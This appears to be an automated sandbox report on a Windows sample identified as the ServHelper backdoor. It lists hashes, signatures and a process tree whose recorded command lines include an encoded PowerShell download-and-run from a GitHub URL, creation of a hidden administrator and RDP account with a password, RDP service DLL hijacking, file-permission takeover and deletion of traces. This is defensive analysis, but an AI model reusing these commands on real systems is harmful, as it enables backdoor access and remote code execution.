Analysis
- max time kernel: 138s
- max time network: 146s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 11-08-2021 08:09

Static task: static1

Behavioral task: behavioral1
- Sample: bfe0ac25eeeb759f7c8e06229c7313a2.exe
- Resource: win7v20210408

Behavioral task: behavioral2
- Sample: bfe0ac25eeeb759f7c8e06229c7313a2.exe
- Resource: win10v20210408
General
- Target: bfe0ac25eeeb759f7c8e06229c7313a2.exe
- Size: 5.9MB
- MD5: bfe0ac25eeeb759f7c8e06229c7313a2
- SHA1: 199c1fbd29f9ec98b83464763dac63ef80998bb3
- SHA256: be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
- SHA512: a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (1 IoCs)
  Processes (flow / pid / process):
    13 / 2024 / powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Possible privilege escalation attempt (8 IoCs)
  Processes (pid / process):
    428 / icacls.exe
    952 / takeown.exe
    1684 / icacls.exe
    968 / icacls.exe
    772 / icacls.exe
    616 / icacls.exe
    1668 / icacls.exe
    1356 / icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- Processes (resource / yara_rule):
    \Windows\Branding\mediasrv.png / upx
    \Windows\Branding\mediasvc.png / upx
- Loads dropped DLL (2 IoCs)
  Processes (pid): 704, 704
- Modifies file permissions (1 TTPs, 8 IoCs)
  Processes (pid / process):
    616 / icacls.exe
    1668 / icacls.exe
    1356 / icacls.exe
    428 / icacls.exe
    952 / takeown.exe
    1684 / icacls.exe
    968 / icacls.exe
    772 / icacls.exe
- Drops file in System32 directory (1 IoCs)
  Processes (description / ioc / process):
    File created / C:\Windows\system32\rfxvmt.dll / powershell.exe
- Drops file in Windows directory (21 IoCs)
  Processes (description / ioc / process):
    File created / C:\Windows\branding\wupsvc.jpg / powershell.exe
    File opened for modification / C:\Windows\branding\Basebrd / powershell.exe
    File opened for modification / C:\Windows\branding\ShellBrd / powershell.exe
    File opened for modification / C:\Windows\branding\wupsvc.jpg / powershell.exe
    File created / C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XC2LLWIOB5R07L41GXKV.temp / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d8f150c2-4e20-4eea-9851-942e1c8c185c / powershell.exe
    File created / C:\Windows\branding\mediasvc.png / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d372afd-2ed0-46e4-9636-95fcd403f796 / powershell.exe
    File opened for modification / C:\Windows\branding\mediasrv.png / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2e256687-099a-49d9-b319-558eaf191221 / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5ffe11fd-951d-406f-9bba-8f00e993b47e / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7b6510f-db1b-4810-a09c-590057c80a63 / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_df1cbe1c-84fa-4429-a4c0-5b9650161aed / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bce54f89-a05f-4ba4-9c4e-b0d91b6999cc / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f0d93a20-279b-4b2e-8b1d-d6e150eb229d / powershell.exe
    File created / C:\Windows\branding\mediasrv.png / powershell.exe
    File opened for modification / C:\Windows\branding\mediasvc.png / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4eaa5ffd-2c0c-4823-8478-329c21979dcb / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f3b19608-e584-4e88-bcac-97afdce2eb6f / powershell.exe
    File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2c79fe24-b267-40e1-87d8-40206420cc1c / powershell.exe
- Modifies data under HKEY_USERS (4 IoCs)
  Processes (description / ioc / process):
    Key created / \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ / WMIC.exe
    Key created / \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ / WMIC.exe
    Key created / \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage / powershell.exe
    Set value (data) / \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 0034a89c998ed701 / powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
  Processes (description / ioc / process):
bfe0ac25eeeb759f7c8e06229c7313a2.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 bfe0ac25eeeb759f7c8e06229c7313a2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e0
4160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 bfe0ac25eeeb759f7c8e06229c7313a2.exe -
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes (pid / process):
    1808 / powershell.exe
    1808 / powershell.exe
    880 / powershell.exe
    880 / powershell.exe
    636 / powershell.exe
    636 / powershell.exe
    1600 / powershell.exe
    1600 / powershell.exe
    1808 / powershell.exe
    1808 / powershell.exe
    1808 / powershell.exe
    2024 / powershell.exe
    2024 / powershell.exe
- Suspicious behavior: LoadsDriver (5 IoCs)
  Processes (pid): 468, 704, 704, 704, 704
- Suspicious use of AdjustPrivilegeToken (19 IoCs)
  Processes (description / pid / process):
    Token: SeDebugPrivilege / 2016 / bfe0ac25eeeb759f7c8e06229c7313a2.exe
    Token: SeDebugPrivilege / 1808 / powershell.exe
    Token: SeDebugPrivilege / 880 / powershell.exe
    Token: SeDebugPrivilege / 636 / powershell.exe
    Token: SeDebugPrivilege / 1600 / powershell.exe
    Token: SeRestorePrivilege / 968 / icacls.exe
    Token: SeAssignPrimaryTokenPrivilege / 1668 / WMIC.exe
    Token: SeIncreaseQuotaPrivilege / 1668 / WMIC.exe
    Token: SeAuditPrivilege / 1668 / WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege / 1668 / WMIC.exe
    Token: SeIncreaseQuotaPrivilege / 1668 / WMIC.exe
    Token: SeAuditPrivilege / 1668 / WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege / 1600 / WMIC.exe
    Token: SeIncreaseQuotaPrivilege / 1600 / WMIC.exe
    Token: SeAuditPrivilege / 1600 / WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege / 1600 / WMIC.exe
    Token: SeIncreaseQuotaPrivilege / 1600 / WMIC.exe
    Token: SeAuditPrivilege / 1600 / WMIC.exe
    Token: SeDebugPrivilege / 2024 / powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid process -> target pid process; each entry is recorded 3 times unless noted):
    2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe -> 1808 powershell.exe
    1808 powershell.exe -> 276 csc.exe
    276 csc.exe -> 1148 cvtres.exe
    1808 powershell.exe -> 880 powershell.exe
    1808 powershell.exe -> 636 powershell.exe
    1808 powershell.exe -> 1600 powershell.exe
    1808 powershell.exe -> 952 takeown.exe
    1808 powershell.exe -> 1684 icacls.exe
    1808 powershell.exe -> 968 icacls.exe
    1808 powershell.exe -> 772 icacls.exe
    1808 powershell.exe -> 616 icacls.exe
    1808 powershell.exe -> 1668 icacls.exe
    1808 powershell.exe -> 1356 icacls.exe
    1808 powershell.exe -> 428 icacls.exe
    1808 powershell.exe -> 1624 reg.exe
    1808 powershell.exe -> 1900 reg.exe
    1808 powershell.exe -> 1552 reg.exe
    1808 powershell.exe -> 1640 net.exe
    1640 net.exe -> 556 net1.exe
    1808 powershell.exe -> 792 cmd.exe
    792 cmd.exe -> 1780 cmd.exe
    1780 cmd.exe -> 1680 net.exe (1 entry)
Processes (nested by parent; cmd is the recorded command line)
- C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe (PID 2016)
  cmd: "C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"
  signatures: Modifies system certificate store; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1808)
    cmd: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    signatures: Drops file in System32 directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 276)
      cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrlp5nw3\xrlp5nw3.cmdline"
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 1148)
        cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3321.tmp" "c:\Users\Admin\AppData\Local\Temp\xrlp5nw3\CSC5ACBF81FDBDD4E84B343FD79E2989E3B.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 880)
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 636)
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1600)
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\takeown.exe (PID 952)
      cmd: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 1684)
      cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 968)
      cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (PID 772)
      cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 616)
      cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 1668)
      cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 1356)
      cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 428)
      cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\reg.exe (PID 1624)
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe (PID 1900)
      cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      signatures: Modifies registry key
    - C:\Windows\system32\reg.exe (PID 1552)
      cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe (PID 1640)
      cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (PID 556)
        cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe (PID 792)
      cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 1780)
        cmd: cmd /c net start rdpdr
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (PID 1680)
          cmd: net start rdpdr
          - C:\Windows\system32\net1.exe (PID 328)
            cmd: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe (PID 1736)
      cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - C:\Windows\system32\cmd.exe (PID 1580)
        cmd: cmd /c net start TermService
        - C:\Windows\system32\net.exe (PID 1708)
          cmd: net start TermService
          - C:\Windows\system32\net1.exe (PID 1828)
            cmd: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe (PID 1680)
      cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe (PID 792)
      cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (PID 276)
  cmd: cmd /C net.exe user WgaUtilAcc 000000 /del
  - C:\Windows\system32\net.exe (PID 2000)
    cmd: net.exe user WgaUtilAcc 000000 /del
    - C:\Windows\system32\net1.exe (PID 880)
      cmd: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (PID 1840)
  cmd: cmd /C net.exe user WgaUtilAcc baKg7SAt /add
  - C:\Windows\system32\net.exe (PID 1552)
    cmd: net.exe user WgaUtilAcc baKg7SAt /add
    - C:\Windows\system32\net1.exe (PID 516)
      cmd: C:\Windows\system32\net1 user WgaUtilAcc baKg7SAt /add
- C:\Windows\System32\cmd.exe (PID 1656)
  cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - C:\Windows\system32\net.exe (PID 960)
    cmd: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - C:\Windows\system32\net1.exe (PID 792)
      cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (PID 772)
  cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
  - C:\Windows\system32\net.exe (PID 1356)
    cmd: net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
    - C:\Windows\system32\net1.exe (PID 1888)
      cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
- C:\Windows\System32\cmd.exe (PID 1540)
  cmd: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - C:\Windows\system32\net.exe (PID 1692)
    cmd: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - C:\Windows\system32\net1.exe (PID 1624)
      cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (PID 1316)
  cmd: cmd /C net.exe user WgaUtilAcc baKg7SAt
  - C:\Windows\system32\net.exe (PID 1680)
    cmd: net.exe user WgaUtilAcc baKg7SAt
    - C:\Windows\system32\net1.exe (PID 1656)
      cmd: C:\Windows\system32\net1 user WgaUtilAcc baKg7SAt
- C:\Windows\System32\cmd.exe (PID 880)
  cmd: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe (PID 1668)
    cmd: wmic path win32_VideoController get name
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe (PID 1624)
  cmd: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (PID 1600)
    cmd: wmic CPU get NAME
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe (PID 1656)
  cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (PID 1692)
    cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2024)
      cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      signatures: Blocklisted process makes network request; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Downloads